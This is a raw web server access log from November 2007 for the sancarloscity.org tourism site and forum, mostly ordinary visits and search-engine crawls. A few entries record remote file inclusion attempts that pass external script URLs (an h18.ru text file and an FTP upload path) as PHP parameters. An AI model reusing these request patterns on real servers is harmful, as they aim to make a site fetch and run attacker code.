222.127.228.5 - - [01/Nov/2007:06:29:27 -0700] "GET /forum2/style_images/2_2_sccilogobluebkgrd.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=154" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:29:29 -0700] "GET /forum2/jscripts/ipb_topic.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=154" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:29:29 -0700] "GET /forum2/index.php?act=Login&CODE=05 HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:29:31 -0700] "GET /forum2/style_images/red_crysta/t_new.gif HTTP/1.1" 200 1947 "http://www.sancarloscity.org/forum2/index.php?showtopic=154" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:29:32 -0700] "GET /forum2/style_images/red_crysta/pip.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=154" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:29:32 -0700] "GET /forum2/style_images/red_crysta/p_up.gif HTTP/1.1" 200 1402 "http://www.sancarloscity.org/forum2/index.php?showtopic=154" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:29:33 -0700] "GET /forum2/style_images/red_crysta/p_mq_add.gif HTTP/1.1" 200 1633 "http://www.sancarloscity.org/forum2/index.php?showtopic=154" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:29:33 -0700] "GET /forum2/style_images/red_crysta/p_quote.gif HTTP/1.1" 200 1516 "http://www.sancarloscity.org/forum2/index.php?showtopic=154" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:29:34 -0700] "GET /forum2/index.php?act=Login&CODE=06 HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:29:35 -0700] "GET /forum2/index.php?s=ed70ba90d6acb038289e4f2d0243799f&act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?showtopic=154" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:29:35 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/pp-blank-thumb.png HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=154" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:29:36 -0700] "GET /forum2/style_images/red_crysta/folder_profile_portal/gender_mystery.png HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?showtopic=154" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
82.99.30.17 - - [01/Nov/2007:06:29:37 -0700] "GET /newmaps/mappage.htm HTTP/1.0" 200 5347 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:29:39 -0700] "GET /forum2/index.php?act=Members HTTP/1.0" 200 67264 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:29:44 -0700] "GET /forum2/index.php?act=Members&max_results=20&sort_key=posts&sort_order=desc&filter=ALL HTTP/1.0" 200 68585 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:29:49 -0700] "GET /forum2/index.php?act=Members&max_results=30&filter=7&sort_order=asc&sort_key=members_display_name&st=0&b=1 HTTP/1.0" 200 21699 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:29:54 -0700] "GET /forum2/index.php?act=Online&CODE=listall&sort_key=click HTTP/1.0" 200 11313 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:29:59 -0700] "GET /forum2/index.php?act=Online&CODE=listall&sort_key=name&sort_order=asc&show_mem=reg HTTP/1.0" 200 7728 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:30:04 -0700] "GET /forum2/index.php?act=Reg&CODE=00 HTTP/1.0" 200 8080 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:30:09 -0700] "GET /forum2/index.php?act=Search HTTP/1.0" 200 7812 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:30:14 -0700] "GET /forum2/index.php?act=Search&CODE=01 HTTP/1.0" 200 7824 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:30:20 -0700] "GET /forum2/index.php?act=Search&f=0 HTTP/1.0" 200 7822 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:30:25 -0700] "GET /forum2/index.php?act=Stats HTTP/1.0" 200 6642 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:30:30 -0700] "GET /forum2/index.php?act=Stats&CODE=leaders HTTP/1.0" 200 10094 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:30:35 -0700] "GET /forum2/index.php?act=calendar&code=showevent&calendar_id=1&event_id=16 HTTP/1.0" 200 9833 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:30:40 -0700] "GET /forum2/index.php?act=calendar&code=showevent&calendar_id=1&event_id=17 HTTP/1.0" 200 9793 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:30:45 -0700] "GET /forum2/index.php?act=calendar&code=showevent&calendar_id=1&event_id=18 HTTP/1.0" 200 9773 "-" "ia_archiver" "www.sancarloscity.org"
74.6.20.205 - - [01/Nov/2007:06:30:48 -0700] "GET /picgallery/ratepic.php?pic=96&rate=2 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.20.205 - - [01/Nov/2007:06:30:49 -0700] "GET /picgallery/displayimage.php?pos=-96 HTTP/1.0" 200 12937 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:30:50 -0700] "GET /forum2/index.php?act=calendar&code=showevent&calendar_id=1&event_id=19 HTTP/1.0" 200 9839 "-" "ia_archiver" "www.sancarloscity.org"
74.6.24.101 - - [01/Nov/2007:06:30:52 -0700] "GET /forum2/index.php?showtopic=130&mode=threaded HTTP/1.0" 200 6281 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:30:55 -0700] "GET /forum2/index.php?act=calendar&code=showevent&calendar_id=1&event_id=20 HTTP/1.0" 200 9758 "-" "ia_archiver" "www.sancarloscity.org"
74.6.20.166 - - [01/Nov/2007:06:31:00 -0700] "GET /qphotogallery/displayimage.php?album=random&cat=0&pos=-250 HTTP/1.0" 200 21649 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:31:01 -0700] "GET /forum2/index.php?act=calendar&code=showevent&calendar_id=1&event_id=21 HTTP/1.0" 200 9758 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:31:06 -0700] "GET /forum2/index.php?act=calendar&code=showevent&calendar_id=1&event_id=22 HTTP/1.0" 200 9848 "-" "ia_archiver" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:10 -0700] "GET / HTTP/1.1" 200 58676 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:10 -0700] "GET /antenna.css HTTP/1.1" 200 1674 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:31:11 -0700] "GET /forum2/index.php?act=calendar&code=showevent&calendar_id=1&event_id=23 HTTP/1.0" 200 9829 "-" "ia_archiver" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:11 -0700] "GET /autoactivate.js HTTP/1.1" 200 5474 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:11 -0700] "GET /sccirtpan1.jpg HTTP/1.1" 200 25068 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:12 -0700] "GET /bg_red_aurora.jpg HTTP/1.1" 200 32099 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:13 -0700] "GET /background_scci_top.jpg HTTP/1.1" 200 69602 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:13 -0700] "GET /bg_glass_bottomleft3.jpg HTTP/1.1" 200 18715 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:15 -0700] "GET /bg_glass_bottomright3.jpg HTTP/1.1" 200 18715 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:15 -0700] "GET /sccinewsidepan1.jpg HTTP/1.1" 200 29777 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:16 -0700] "GET /wheretostaytab2.jpg HTTP/1.1" 200 26860 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:31:16 -0700] "GET /forum2/index.php?act=calendar&code=showevent&calendar_id=1&event_id=24 HTTP/1.0" 200 9830 "-" "ia_archiver" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:16 -0700] "GET /wheretostaytab1.jpg HTTP/1.1" 200 25858 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:31:16 -0700] "POST /forum2/index.php?s=ed70ba90d6acb038289e4f2d0243799f& HTTP/1.1" 200 3327 "http://www.sancarloscity.org/forum2/index.php?showtopic=154" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:17 -0700] "GET /wheretoeattab2.jpg HTTP/1.1" 200 26730 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:18 -0700] "GET /wheretoeattab1.jpg HTTP/1.1" 200 25761 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:18 -0700] "GET /whattodotab2.jpg HTTP/1.1" 200 26426 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
222.127.228.5 - - [01/Nov/2007:06:31:19 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?s=ed70ba90d6acb038289e4f2d0243799f&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:19 -0700] "GET /whattodotab1.jpg HTTP/1.1" 200 25422 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:19 -0700] "GET /whattoseetab2.jpg HTTP/1.1" 200 26704 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:20 -0700] "GET /whattoseetab1.jpg HTTP/1.1" 200 25736 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:20 -0700] "GET /sccilinksicons.jpg HTTP/1.1" 200 33512 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:31:21 -0700] "GET /forum2/index.php?act=calendar&code=showevent&calendar_id=1&event_id=26 HTTP/1.0" 200 9815 "-" "ia_archiver" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:22 -0700] "GET /360maps.jpg HTTP/1.1" 200 12355 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:22 -0700] "GET /sccimidline.jpg HTTP/1.1" 200 22936 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:23 -0700] "GET /newpost.gif HTTP/1.1" 200 82 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:23 -0700] "GET /photo-116.jpg HTTP/1.1" 200 5005 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:23 -0700] "GET /pp-blank-large.png HTTP/1.1" 200 10903 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:24 -0700] "GET /ymblogo2new.gif HTTP/1.1" 200 8010 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:24 -0700] "GET /5star.jpg HTTP/1.1" 200 1016 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:24 -0700] "GET /banner.jpg HTTP/1.1" 200 5359 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:26 -0700] "GET /ad.gif HTTP/1.1" 200 6757 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:26 -0700] "GET /photo-163.jpg HTTP/1.1" 200 6164 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:31:26 -0700] "GET /forum2/index.php?act=calendar&code=showevent&calendar_id=1&event_id=27 HTTP/1.0" 200 9804 "-" "ia_archiver" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:27 -0700] "GET /photo-162.jpg HTTP/1.1" 200 5970 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:27 -0700] "GET /sccisamplepage_02.gif HTTP/1.1" 200 7431 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:27 -0700] "GET /newpanmaster.png HTTP/1.1" 200 943 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:28 -0700] "GET /newpanmaster2.png HTTP/1.1" 200 927 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
82.171.121.225 - - [01/Nov/2007:06:31:30 -0700] "GET /sccinewsearch.jpg HTTP/1.1" 200 22686 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; IEMB3)" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:31:31 -0700] "GET /forum2/index.php?act=calendar&code=showevent&calendar_id=1&event_id=28 HTTP/1.0" 200 9787 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:31:36 -0700] "GET /forum2/index.php?act=calendar&code=showevent&calendar_id=1&event_id=30 HTTP/1.0" 200 9799 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:31:42 -0700] "GET /forum2/index.php?act=calendar&code=showevent&calendar_id=1&event_id=31 HTTP/1.0" 200 9802 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:31:47 -0700] "GET /forum2/index.php?act=calendar&code=showevent&calendar_id=1&event_id=33 HTTP/1.0" 200 9901 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:31:52 -0700] "GET /forum2/index.php?act=calendar&code=showevent&calendar_id=1&event_id=34 HTTP/1.0" 200 9838 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:32:00 -0700] "GET /forum2/index.php?act=calendar&code=showevent&calendar_id=1&event_id=35 HTTP/1.0" 200 9909 "-" "ia_archiver" "www.sancarloscity.org"
69.159.144.67 - - [01/Nov/2007:06:32:05 -0700] "GET /picgallery/index.php?cat=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 54435 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:32:10 -0700] "GET /forum2/index.php?act=home HTTP/1.0" 200 14503 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:32:16 -0700] "GET /forum2/index.php?act=module&module=gallery HTTP/1.0" 200 21646 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:32:22 -0700] "GET /forum2/index.php?act=rssout&id=1 HTTP/1.0" 200 4884 "-" "ia_archiver" "www.sancarloscity.org"
65.55.209.49 - - [01/Nov/2007:06:32:22 -0700] "GET /form/bform2.htm HTTP/1.0" 200 21133 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:32:26 -0700] "GET /forum2/index.php?act=search&CODE=getactive HTTP/1.0" 200 7831 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:32:31 -0700] "GET /forum2/index.php?act=stats HTTP/1.0" 200 6642 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:32:36 -0700] "GET /forum2/index.php?automodule=blog HTTP/1.0" 200 21451 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:32:41 -0700] "GET /forum2/index.php?s=& HTTP/1.0" 200 32860 "-" "ia_archiver" "www.sancarloscity.org"
65.55.165.93 - - [01/Nov/2007:06:32:44 -0700] "GET /form/bform2.htm HTTP/1.0" 200 21133 "http://search.live.com/results.aspx?q=restaurant&mrt=en-us&FORM=LIVSOP" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "www.sancarloscity.org"
65.55.165.93 - - [01/Nov/2007:06:32:44 -0700] "GET /style.css HTTP/1.0" 200 17050 "http://www.sancarloscity.org/form/bform2.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:32:48 -0700] "GET /forum2/index.php?showforum=10 HTTP/1.0" 200 32586 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:32:53 -0700] "GET /forum2/index.php?showforum=11 HTTP/1.0" 200 35686 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:32:58 -0700] "GET /forum2/index.php?showforum=12 HTTP/1.0" 200 20654 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:33:03 -0700] "GET /forum2/index.php?showforum=13 HTTP/1.0" 200 23216 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:33:08 -0700] "GET /forum2/index.php?showforum=14 HTTP/1.0" 200 9119 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:33:13 -0700] "GET /forum2/index.php?showforum=15 HTTP/1.0" 200 21441 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:33:18 -0700] "GET /forum2/index.php?showforum=16 HTTP/1.0" 200 32762 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:33:23 -0700] "GET /forum2/index.php?showforum=17 HTTP/1.0" 200 18930 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:33:28 -0700] "GET /forum2/index.php?showforum=3 HTTP/1.0" 200 11286 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:33:33 -0700] "GET /forum2/index.php?showforum=4 HTTP/1.0" 200 28026 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:33:38 -0700] "GET /forum2/index.php?showforum=5 HTTP/1.0" 200 26708 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:33:43 -0700] "GET /forum2/index.php?showforum=7 HTTP/1.0" 200 22808 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:33:48 -0700] "GET /forum2/index.php?showforum=8 HTTP/1.0" 200 16441 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:33:53 -0700] "GET /forum2/index.php?showforum=9 HTTP/1.0" 200 55400 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:33:58 -0700] "GET /forum2/index.php?showtopic=138&view=getlastpost HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:33:58 -0700] "GET /forum2/index.php?showtopic=138&pid=770&st=0&#entry770 HTTP/1.0" 200 33508 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:03 -0700] "GET /forum2/index.php?showtopic=138&view=getnewpost HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:03 -0700] "GET /forum2/index.php?showtopic=138&st=0&#entry720 HTTP/1.0" 200 33372 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:09 -0700] "GET /forum2/index.php?showtopic=145&view=getlastpost HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:09 -0700] "GET /forum2/index.php?showtopic=145&pid=825&st=0&#entry825 HTTP/1.0" 200 24514 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:14 -0700] "GET /forum2/index.php?showtopic=145&view=getnewpost HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:14 -0700] "GET /forum2/index.php?showtopic=145&st=0&#entry824 HTTP/1.0" 200 24378 "-" "ia_archiver" "www.sancarloscity.org"
209.250.239.170 - - [01/Nov/2007:06:34:18 -0700] "GET /jodera2/joderaphoto/displayim...bum=random&cat=0&pos=-387//tools/send_reminders.php?includedir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 827 "-" "libwww-perl/5.808" "www.sancarloscity.org"
209.250.239.170 - - [01/Nov/2007:06:34:18 -0700] "GET //tools/send_reminders.php?includedir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 761 "-" "libwww-perl/5.808" "www.sancarloscity.org"
209.250.239.170 - - [01/Nov/2007:06:34:18 -0700] "GET /jodera2/joderaphoto//tools/send_reminders.php?includedir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 781 "-" "libwww-perl/5.808" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:19 -0700] "GET /forum2/index.php?showtopic=147&view=getlastpost HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:20 -0700] "GET /forum2/index.php?showtopic=147&pid=872&st=0&#entry872 HTTP/1.0" 200 25560 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:25 -0700] "GET /forum2/index.php?showtopic=147&view=getnewpost HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:25 -0700] "GET /forum2/index.php?showtopic=147&st=0&#entry832 HTTP/1.0" 200 25424 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:29 -0700] "GET /forum2/index.php?showtopic=152&view=getlastpost HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:30 -0700] "GET /forum2/index.php?showtopic=152&pid=868&st=0&#entry868 HTTP/1.0" 200 30560 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:34 -0700] "GET /forum2/index.php?showtopic=152&view=getnewpost HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:34 -0700] "GET /forum2/index.php?showtopic=152&st=0&#entry839 HTTP/1.0" 200 30424 "-" "ia_archiver" "www.sancarloscity.org"
64.208.172.181 - - [01/Nov/2007:06:34:40 -0700] "GET /forum2/index.php?showtopic=154&view=getlastpost HTTP/1.0" 302 0 "-" "ia_archiver" "www.sancarloscity.org"
